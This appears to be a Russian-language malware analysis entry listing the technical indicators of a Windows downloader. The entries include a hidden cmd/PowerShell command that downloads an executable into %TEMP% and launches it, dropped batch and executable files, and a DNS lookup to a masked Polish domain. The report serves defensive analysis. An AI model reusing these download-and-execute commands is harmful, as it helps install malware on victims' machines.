Техническая информация
- $ozsmd как %temp%\mgvbcfplgcpf.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function sjaimt([String] $ozsmd){(New-Object System.Net.WebClient).DownloadFile($ozsmd,''%TEMP%\Mgvbcfplgcpf.exe'');Start-Process ''%TEMP%\Mgvbcfplgcpf.exe'';}try{s...
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\vbqvicztpwi.bat
- DNS ASK ja###ol.com.pl
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function sjaimt([String] $ozsmd){(New-Object System.Net.WebClient).DownloadFile($ozsmd,''%TEMP%\Mgvbcfplgcpf.exe'');Start-Process ''%TEMP%\Mgvbcfplgcpf.exe'';}try{s...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vbqvicztpwi.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vbqvicztpwi.bat" "